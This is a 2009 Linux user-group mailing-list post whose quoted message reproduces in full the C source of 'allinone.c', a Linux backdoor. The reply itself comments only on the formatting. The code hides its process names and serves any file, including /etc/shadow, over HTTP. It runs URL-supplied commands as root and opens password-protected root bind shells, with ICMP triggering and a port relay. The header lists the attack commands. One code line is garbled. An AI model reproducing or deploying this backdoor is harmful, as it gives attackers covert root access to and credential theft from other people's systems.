Linux Security Team Toy Series: allinone.c
Ryan Rix
phrkonaleash at gmail.com
Sun Jul 12 20:29:26 MST 2009
On Sun 12 July 2009 7:49:13 pm Lisa Kachold wrote:
> Shell coding fun with ICMP/HTTP, Socks proxy.
>
> AllINONE.c
>
> /************************************************************************
> * allinone.c for HUC (2002.1)
> *
> * allinone.c is
> * a Http server,
> * a sockets transmit server,
> * a shell backdoor,
> * a icmp backdoor,
> * a bind shell backdoor,
> * a like http shell,
> * it can translate file from remote host,
> * it can give you a socks5 proxy,
> * it can use for to attack, jumps the extension, Visits other machines.
> * it can give you a root shell.:)
> *
> * Usage:
> * compile:
> * gcc -o allinone allinone.c -lpthread
> * run on target:
> * ./allinone
> *
> * 1.httpd server
> * Client:
> * http://target:8008/givemefile/etc/passwd
> * lynx -dump http://target:8008/givemefile/etc/shadow > shadow
> * or wget http://target:8008/givemefile/etc/shadow
> *
> * 2.icmp backdoor
> * Client:
> * ping -l 101 target (on windows)
> * ping -s 101 -c 4 target (on linux)
> * nc target 8080
> * kissme:) --> your password
> *
> * 3.shell backdoor
> * Client:
> * nc target 8008
> * kissme:) --> your password
> *
> * 4.bind a root shell on your port
> * Client:
> * http://target:8008/bindport:9999
> * nc target 9999
> * kissme:) --> your password
> *
> * 5.sockets transmit
> * Client:
> * http://target:8008/socks/:local listen port::you want to tran
> ip:::you want to tran port
> * http://target:8008/socks/:1080::192.168.0.1:::21
> * nc target 1080
> *
> * 6.http shell
> * Client:
> * http://target:8008/givemeshell:ls -al (no pipe)
> *
> * ps:
> * All bind shell have a passwd, default is: kissme:)
> * All bind shell will close, if Two minutes do not have the connection.
> * All bind shell only can use one time until reactivates.
> *
> *
> * Code by lion, e-mail: lion at cnhonker.net
> * Welcome to HUC Website, Http://www.cnhonker.com
> *
> * Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
> * Thx bkbll's Transmit code, and thx Neil,con,iceblood for test.
> *
> ************************************************************************/
>
>
> #include <stdio.h>
> #include <string.h>
> #include <signal.h>
> #include <netdb.h>
> #include <netinet/ip.h>
> #include <netinet/in.h>
> #include <sys/wait.h>
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <sys/time.h>
> #include <pthread.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <errno.h>
>
>
> #define HTTPD_PORT 8008
> #define BIND_PORT 8888
> #define ICMP_PORT 8080
> #define TRAN_PORT 1080
> #define SIZEPACK 101
> #define MAXSIZE 32768
> #define TIMEOUT 120
> #define CONNECT_NUMBER 1
> #define HIDEME "[login] "
> #define HIDEICMP "[su] "
> #define HIDEFILE "[bash] "
> #define GET_FILE "givemefile"
> #define SHELL_NAME "givemeshell"
> #define BIND_NAME "bindport"
> #define TRAN_NAME "socks"
> #define DISPART ":"
> #define DISPART1 "::"
> #define DISPART2 ":::"
> #define PASSWORD "kissme:)" /* Change it */
> #define MESSAGE "\r\n========Welcome to
> http://www.cnhonker.com========\r\n==========You got it, have a
> goodluck. :)=========\r\n\r\nYour command: \0"
> #define GIVEPASS "\r\nEnter Your password: \0"
>
> #define max(a, b) (a)>(b)?(a) : (b)
>
> int maxfd, infd, outfd;
> unsigned char ret_buf[32768];
>
> int daemon_init(); /* init the daemon, if success return 0 other <0 */
> void sig_chid(); /* wait the child die */
> int TCP_listen(); /* success return 1 else return -1 */
> char* read_file(); /* return the file content as a large string, buf
> value like GET /index.html HTTP:/1.1 */
> ssize_t writen_file(); /* writen data to socket */
> int bind_shell(); /* bind a root shell to a port */
> int get_shell(); /* get me the root shell */
> int icmp_shell(); /* icmp backdoor */
> int socks(); /* socks */
> int create_socket();
> int create_serv();
> int client_connect();
> int quit();
> void out2in();
> char x2c(); /* http shell */
> void unescape_url();
> void plustospace();
>
>
> /* The main function from here */
> int main(int argc, char *argv[])
> {
> int fd, len, i, icmp;
> int csocket;
> struct sockaddr_in caddr;
> char readstr[4000];
> char *cbuf;
> pid_t pid;
>
> /* make it to a daemon */
> /*signal(SIGHUP, SIG_IGN);*/
> signal(SIGCHLD, sig_chid);
> daemon_init();
>
> if((pid = fork()) == -1) exit(0);
> if(pid <= 0)
> {
> strcpy(argv[0], HIDEICMP);
> icmp_shell();
> }
>
> fd = TCP_listen(HTTPD_PORT);
> if(fd <= 0) return -1;
>
> for(;;)
> {
> strcpy(argv[0], HIDEME);
>
> /* check httpd */
> len = sizeof(caddr);
> if((csocket = accept(fd, &caddr, &len)) < 0) continue;
> if((pid = fork()) == -1) continue;
> if(pid <= 0)
> {
> strcpy (argv[0], HIDEFILE);
> i = recv(csocket, readstr, 4000,0);
> if (i == -1) break;
> if( readstr[ i -1 ] != '\n' ) break;
> readstr [i] = '\0';
> /*printf("Read from client: %s \n", readstr);*/
> cbuf = read_file(readstr, csocket);
> close(csocket);
> }
> close(csocket);
> }
> close(fd);
> return(1);
> }
>
>
> /* init the daemon, if success return 0 other <0 */
> int daemon_init()
> {
> struct sigaction act;
> int i, maxfd;
>
> if(fork() != 0) exit(0);
> if(setsid() < 0) return(-1);
>
> act.sa_handler = SIG_IGN;
> /*act.sa_mask = 0;*/
> act.sa_flags = 0;
>
> sigaction(SIGHUP, &act, 0);
>
> if(fork() != 0) exit(0);
>
> chdir("/");
> umask(0);
> maxfd = sysconf(_SC_OPEN_MAX);
> for(i=0; i<maxfd; i++)
> close(i);
> open("/dev/null", O_RDWR);
> dup(0);
> dup(1);
> dup(2);
> return(0);
> }
>
>
> /* wait the child die */
> void sig_chid(int signo)
> {
> pid_t pid;
> int stat;
> while((pid = waitpid(-1, &stat, WNOHANG))>0);
> printf("children %d died\n", pid);
> return;
> }
>
> /* success return 1 else return -1 */
> int TCP_listen(int port)
> {
> struct sockaddr_in laddr ;
> int fd;
> socklen_t len ;
> fd = socket(AF_INET, SOCK_STREAM, 0);
> len = sizeof(laddr) ;
> memset(&laddr, 0, len) ;
> laddr.sin_addr.s_addr = htonl(INADDR_ANY) ;
> laddr.sin_family = AF_INET ;
> laddr.sin_port = htons(port) ;
> if((bind(fd, (const struct sockaddr *)&laddr, len))) return(-1);
> if(listen(fd, 5)) return(-1);
> return(fd);
> }
>
> /* http server */
> char * read_file(char *buf, int fd)
> {
> char *erro=
> "Content-type: text/html\n\n"
> "HTTP/1.1 404 Not Found\n"
> "Date: Mon, 14 Jan 2002 03:19:55 GMT\n"
> "Server: Apache/1.3.22 (Unix)\n"
> "Connection: close\n"
> "Content-Type: text/html\n\n"
> "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 4.0//EN\">\n"
> "<HTML><HEAD>\n"
> "<TITLE>404 Not Found</TITLE>\n"
> "</HEAD><BODY>\n"
> "<H1>Not Found</H1>\n"
> "The requested URL was not found on this server.<P>\n"
> "<HR>\n"
> "<ADDRESS>Apache/1.3.22 Server at localhost Port 8008</ADDRESS>\n"
> "</BODY></HTML>\n\n";
>
> char *bindok=
> "Content-type: text/html\n\n"
> "<html>\n<head><title>Bind Shell ok.:)</title></head>\n"
> "<body bgcolor=\"#000000\">\n"
> "<div align=\"center\"><p>\n"
> "<font face=\"Arial\" color=\"#999999\" size=\"7\"><b>\n"
> "You get it, goodluck! :-)\n"
> "</b></font></p></div><br>\n"
> "</body></html>\n\n";
>
> char *tranok=
> "Content-type: text/html\n\n"
> "<html>\n<head><title>Tran ok.:)</title></head>\n"
> "<body bgcolor=\"#000000\">\n"
> "<div align=\"center\"><p>\n"
> "<font face=\"Arial\" color=\"#999999\" size=\"7\"><b>\n"
> "Tran ok!\n"
> "</b></font></p></div><br>\n"
> "</body></html>\n\n";
>
> char *httpok1=
> "Content-type: text/html\n\n"
> "<html>\n<head><title>Shell ok.:)</title></head>\n"
> "<body bgcolor=\"#000000\">\n"
> "<div align=\"left\">\n"
> "<pre><font face=\"Arial\" color=\"#999999\" size=\"2\">\n";
>
> char *httpok2=
> "</font></pre></div><br>\n"
> "</body></html>\n\n";
>
> char *yourcom=
> "<b>Your Command:</b>\n";
>
> char *br=
> "<br>\n";
>
> int listenp, targetp, i, j, c, bport;
> char *cmd, *par, *op, *hp, *tp, *targeth, *command;
> char *swap_file = "/tmp/tmp.txt";
> char *setpath =
> "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:.";
> FILE *f;
>
> /* check give me shell */
> cmd = buf;
> par = strstr(cmd, PASSWORD);
> if(par != NULL)
> {
> /*printf("Get Shell:\n");*/
> get_shell(fd);
> exit(0);
> }
>
> /* check bind root shell on a port */
> par = strstr(cmd, BIND_NAME);
> op = strstr(cmd, DISPART);
> if(par != NULL && op != NULL)
> {
> bport = atoi(op + strlen(DISPART));
> if(bport <= 0)
> bport = BIND_PORT;
> /*printf("Bind Port: %d\n", bport);*/
> write(fd, bindok, strlen(bindok));
> close(fd);
> bind_shell(bport);
> exit(0);
> }
>
> /* check Tran code */
> par = strstr(cmd, TRAN_NAME);
> op = strstr(cmd, DISPART);
> hp = strstr(cmd, DISPART1);
> tp = strstr(cmd, DISPART2);
> if(par != NULL && op != NULL && hp != NULL && tp != NULL)
> {
> listenp = atoi(op + strlen(DISPART));
> if(listenp <= 0)
> listenp = TRAN_PORT;
> targetp = atoi(tp + strlen(DISPART2));
> if(targetp <= 0)
> targetp = 23;
>
> hp = (hp + strlen(DISPART1));
> targeth = strncpy(ret_buf, hp,strlen(hp) - strlen(tp));
> targeth[strlen(hp) - strlen(tp)] = '\0';
>
> /*printf("Tran Port: listen %d port to %s %d port\n", listenp,
> targeth, targetp);*/
> write(fd, tranok, strlen(tranok));
> close(fd);
> /*
> listenp = 1080;
> targetp = 21;
> targeth = "192.168.0.14";
> */
> socks(listenp, targeth, targetp);
> exit(0);
> }
>
> /* check http shell */
> par = strstr(cmd, SHELL_NAME);
> op = strstr(cmd, DISPART);
> if(par != NULL && op != NULL)
> {
> tp = buf + 5 + strlen(SHELL_NAME) + strlen(DISPART);
> hp = strstr(tp, "HTTP");
> if(hp != NULL) *hp = '\0';
> tp[strlen(tp) - 1] = 0;
> plustospace(tp);
> unescape_url(tp);
> /*printf("HTTP Shell: %s\n", tp);*/
>
> c = j = strlen(tp);
> tp[j] = ' ';j++;
> tp[j] = ' ';j++;
> tp[j] = '>';j++;
> tp[j] = ' ';j++;
> for(i = 0; i <= strlen(swap_file); i++, j++)
> {
> tp[j] = swap_file[i];
> }
> tp[j + strlen(swap_file)] = '\0';
>
> command = tp;
> /*printf("command: %s\n",command); */
> setuid(0);
> setgid(0);
> chdir("/");
> putenv(setpath);
> /*printf("setpath ok!\n");*/
> system(command);
> /*printf("system ok!\n");*/
>
> f = fopen(swap_file, "r");
> if (f == NULL)
> {
> /*printf("Swap file error");*/
> writen_file(fd, erro, strlen(erro));
> return erro;
> }
>
> writen_file(fd, httpok1, strlen(httpok1));
> writen_file(fd, yourcom, strlen(yourcom));
> writen_file(fd, command, c);
> writen_file(fd, br, strlen(br));
> writen_file(fd, br, strlen(br));
> while( !feof(f) )
> {
> i = fread(ret_buf, 1, 32768, f);
> if (i == 0) break;
> writen_file(fd, ret_buf, i);
> }
> fclose(f);
> writen_file(fd, br, strlen(br));
> writen_file(fd, httpok2, strlen(httpok2));
> remove(swap_file);
> exit(0);
> }
>
> /* check getfile */
> par = NULL;
> par = strstr(cmd, GET_FILE);
> if(par != NULL)
> {
> op = buf + 5 + strlen(GET_FILE);
> tp = strstr(op, "HTTP");
> if(tp != NULL) *tp = '\0';
> op[strlen(op) - 1] = 0;
> /*printf("Get File: %s\n", op);*/
> f = fopen(op, "r");
> if (f == NULL)
> {
> writen_file(fd, erro, strlen(erro));
> return erro;
> }
>
> while( !feof(f) )
> {
> i = fread(ret_buf, 1, 32768, f);
> if (i == 0) break;
> writen_file(fd, ret_buf, i);
> }
> fclose(f);
> exit(0);
> }
> writen_file(fd, erro, strlen(erro));
> close(fd);
> exit(-1);
> }
>
>
> /* writen data to socket */
> ssize_t writen_file(int fd, const void *vptr, size_t n)
> {
> size_t nleft;
> ssize_t nwritten;
> const char *ptr;
> ptr = vptr;
> nleft = n;
> while(nleft > 0)
> {
> if((nwritten = write(fd, ptr, nleft)) <= 0)
> {
> if(errno == EINTR)
> nwritten = 0;
> else
> return(-1);
> }
> nleft -= nwritten;
> ptr += nwritten;
> }
> return(n);
> }
>
> /* bind root shell to a port */
> int bind_shell(int port)
> {
> int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time;
> char passwd[15];
>
> struct sockaddr_in serv_addr;
> struct sockaddr_in client_addr;
> struct timeval testtime;
>
> setuid(0);
> setgid(0);
> seteuid(0);
> setegid(0);
>
> chdir("/");
>
> soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
>
> if (soc_des == -1)
> exit(-1);
>
> bzero((char *) &serv_addr,sizeof(serv_addr));
> serv_addr.sin_family = AF_INET;
> serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
> serv_addr.sin_port = htons(port);
>
> soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
>
> if (soc_rc != 0)
> exit(-1);
> if (fork() != 0)
> exit(0);
> setpgrp();
> if (fork() != 0)
> exit(0);
> soc_rc = listen(soc_des, 5);
> if (soc_rc != 0)
> exit(0);
>
> testtime.tv_sec = TIMEOUT;
> testtime.tv_usec = 0;
>
> /*setsockopt(soc_des, SOL_SOCKET, SO_RCVTIMEO, &testtime,
> sizeof(testtime));*/
>
> alarm(TIMEOUT);
> soc_len = sizeof(client_addr);
> soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
>
> if (soc_cli < 0)
> exit(0);
> alarm(0);
>
> cli_pid = getpid();
> server_pid = fork();
>
> if (server_pid != 0)
> {
> write(soc_cli, GIVEPASS, strlen(GIVEPASS));
> recv(soc_cli, passwd, sizeof(passwd), 0);
>
> for (i = 0; i < strlen(passwd); i++)
> {
> if (passwd[i] == '\n' || passwd[i] == '\r')
> {
> passwd[i] = '\0';
> }
> }
>
> if (strcmp(passwd, PASSWORD) != 0)
> {
> close(soc_cli);
> close(soc_rc);
> exit(-1);
> }
>
> write(soc_cli, MESSAGE, strlen(MESSAGE));
> for (i = 0; i < 3; i++)
> {
> dup2(soc_cli, i);
> }
>
> execl("/bin/sh","sh",(char *)0);
> close(soc_cli);
> close(soc_rc);
> exit(1);
> }
> close(soc_cli);
> close(soc_rc);
> exit(0);
> }
>
> /* return a root shell */
> int get_shell(int fd)
> {
> int i;
> setuid(0);
> setgid(0);
>
> chdir("/");
> write(fd, MESSAGE, strlen(MESSAGE));
> for (i = 0; i < 3; i++)
> {
> dup2(fd, i);
> }
> execl("/bin/sh","sh",(char *)0);
> close(fd);
> return 1;
> }
>
> /* icmp backdoor */
> int icmp_shell()
> {
> int i, s, size, fromlen, port = ICMP_PORT;
> char pkt[4096];
>
> struct protoent *proto;
> struct sockaddr_in from;
>
> proto = getprotobyname("icmp");
>
> /* can't creat raw socket */
> if((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0)
> exit(0);
>
> /* waiting for packets */
> while(1)
> {
> do
> {
> fromlen = sizeof(from);
> if((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr
> *)&from, &fromlen)) < 0)
> printf("", size - 28);
> }while(size != SIZEPACK + 28);
>
> /* size == SIZEPACK, let's bind the shell on your port :)*/
> switch(fork())
> {
> case -1:
> continue;
>
> case 0:
> bind_shell(port);
> exit (0);
> }
> }
> return 1;
> }
>
> /* tran socks code */
> int socks(int listenp, char *targeth, int targetp)
> {
> int listfd, outside, inside, size;
> pthread_t thread1;
> struct sockaddr_in client;
>
> if(!(listfd = create_socket())) exit(1);
> if(!(create_serv(listfd, listenp))) exit(1);
>
> for(;;)
> {
> size = sizeof(struct sockaddr);
> /*printf("waiting for response.........\n");*/
> if((outfd = accept(listfd, (struct sockaddr *)&client, &size)) < 0)
> {
> /*printf("accept error\n");*/
> continue;
> }
>
> /*printf("accept a client from %s\n", inet_ntoa(client.sin_addr));*/
> if(!(infd=create_socket())) exit(1);
> if(!(client_connect(infd, targeth, targetp))) quit(outfd, infd, listfd);
>
> maxfd = max(outfd, infd) + 1;
> pthread_create(&thread1, NULL, (void *)&out2in, NULL);
> }
> close(listfd);
> }
>
> int create_socket()
> {
> int sockfd;
>
> if((sockfd = socket(AF_INET, SOCK_STREAM, 0))<0)
> {
> /*printf("Create socket error\n");*/
> return(0);
> }
> return(sockfd);
> }
>
> int create_serv(int sockfd, int port)
> {
> struct sockaddr_in srvaddr;
>
> bzero(&srvaddr, sizeof(struct sockaddr));
> srvaddr.sin_port = htons(port);
> srvaddr.sin_family = AF_INET;
> srvaddr.sin_addr.s_addr = htonl(INADDR_ANY);
>
> if(bind(sockfd, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr))<0)
> {
> /*printf("Bind to port %d error\n",port);*/
> return(0);
> }
>
> if(listen(sockfd,CONNECT_NUMBER)<0)
> {
> /*printf("listen error\n");*/
> return(0);
> }
> return(1);
> }
>
> int client_connect(int sockfd, char *server, int port)
> {
> struct sockaddr_in cliaddr;
> struct hostent *host;
>
> if(!(host = gethostbyname(server)))
> {
> /*printf("gethostbyname error:%s\n",server);*/
> return(0);
> }
>
> bzero(&cliaddr, sizeof(struct sockaddr));
> cliaddr.sin_family = AF_INET;
> cliaddr.sin_port = htons(port);
> cliaddr.sin_addr = *((struct in_addr *)host->h_addr);
>
> if(connect(sockfd, (struct sockaddr *)&cliaddr, sizeof(struct sockaddr)) <
> 0) {
> /*printf("connect %s:%d error\n",server,port);*/
> return(0);
> }
> return(1);
> }
>
> int quit(int a, int b, int c)
> {
> close(a);
> close(b);
> close(c);
> exit(1);
> }
>
> void out2in()
> {
> struct timeval timeset;
> fd_set readfd, writefd;
> int result, i = 0;
> char read_in1[MAXSIZE], send_out1[MAXSIZE];
> char read_in2[MAXSIZE], send_out2[MAXSIZE];
> int read1 = 0, totalread1 = 0, send1=0;
> int read2 = 0, totalread2 = 0, send2=0;
> int out_fd, in_fd;
>
> out_fd = outfd;
> in_fd = infd;
>
> bzero(read_in1, MAXSIZE);
> bzero(read_in2, MAXSIZE);
> bzero(send_out1, MAXSIZE);
> bzero(send_out2, MAXSIZE);
>
> timeset.tv_sec = TIMEOUT;
> timeset.tv_usec = 0;
>
> while(1)
> {
> FD_ZERO(&readfd);
> FD_ZERO(&writefd);
>
> FD_SET(out_fd, &readfd);
> FD_SET(in_fd, &writefd);
> FD_SET(out_fd, &writefd);
> FD_SET(in_fd, &readfd);
>
> result = select(maxfd, &readfd, &writefd, NULL, °¡et);
> if(result < 0)
> {
> /*printf("select error\n");*/
> return;
> }
> else
> if(result == 0)
> {
> /*printf("time out\n");*/
> return;
> }
>
> if(FD_ISSET(out_fd, &readfd))
> {
> read1 = recv(out_fd, read_in1, MAXSIZE, 0);
> if(read1 == 0) break;
> if(read1 < 0)
> {
> /*printf("read data error\n");*/
> return;
> }
> memcpy(send_out1 + totalread1, read_in1, read1);
> totalread1 += read1;
> bzero(read_in1, MAXSIZE);
> }
> if(FD_ISSET(in_fd, &writefd))
> {
> while(totalread1 > 0)
> {
> send1 = write(in_fd, send_out1, totalread1);
> if(send1 == 0)break;
> if(send1 < 0)
> {
> /*printf("unknow error\n");*/
> continue;
> }
> totalread1 -= send1;
> }
> bzero(send_out1, MAXSIZE);
> }
>
> if(FD_ISSET(in_fd, &readfd))
> {
> read2 = recv(in_fd, read_in2, MAXSIZE, 0);
> if(read2 == 0) break;
> if(read2 < 0)
> {
> /*printf("read data error\n");*/
> return;
> }
>
> memcpy(send_out2 + totalread2, read_in2, read2);
> totalread2 += read2;
> bzero(read_in2, MAXSIZE);
> }
>
> if(FD_ISSET(out_fd, &writefd))
> {
> while(totalread2 > 0)
> {
> send2 = write(out_fd, send_out2, totalread2);
> if(send2 == 0) break;
> if(send2 < 0)
> {
> /*printf("unknow error\n");*/
> continue;
> }
>
> totalread2 -= send2;
> }
> bzero(send_out2, MAXSIZE);
> }
> }
> close(out_fd);
> close(in_fd);
> return;
> }
>
> char x2c(char *what)
> {
> register char digit;
>
> digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0'));
> digit *= 16;
> digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0'));
> return (digit);
> }
>
>
> void unescape_url(char *url)
> {
> register int x, y;
>
> for(x = 0 , y = 0; url[y]; ++x, ++y)
> {
> if((url[x] = url[y]) == '%')
> {
> url[x] = x2c(&url[y + 1]);
> y += 2;
> }
> }
> url[x] = '\0';
> }
>
> void plustospace(char *str)
> {
> register int x;
>
> for(x = 0; str[x]; x++)
> if (str[x] == '+')
> str[x] = ' ';
> }
>
>
> endfun
This would be so much better as an attachment so my mail client didn't die
horribly and it could be translated to a compilable file easily ;)
---
Ryan Rix
(623)-826-0051
Linus Torvalds:
> This is the special easter release of linux, more mundanely called 1.3.84
Winfried Truemper:
> Umh, oh. What do you mean by "special easter release"?. Will it quit
> working today and rise on easter?
http://hackersramblings.wordpress.com | http://twitter.com/phrkonaleash
XMPP: phrkonaleash at gmail.com | MSN: phrkonaleash at yahoo.com
AIM: phrkonaleash | Yahoo: phrkonaleash
IRC: PhrkOnLsh at irc.freenode.net/#srcedit,#teensonlinux,#plugaz and
countless other FOSS channels.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 198 bytes
Desc: This is a digitally signed message part.
Url : http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20090712/95c74ecc/attachment.pgp
More information about the PLUG-discuss
mailing list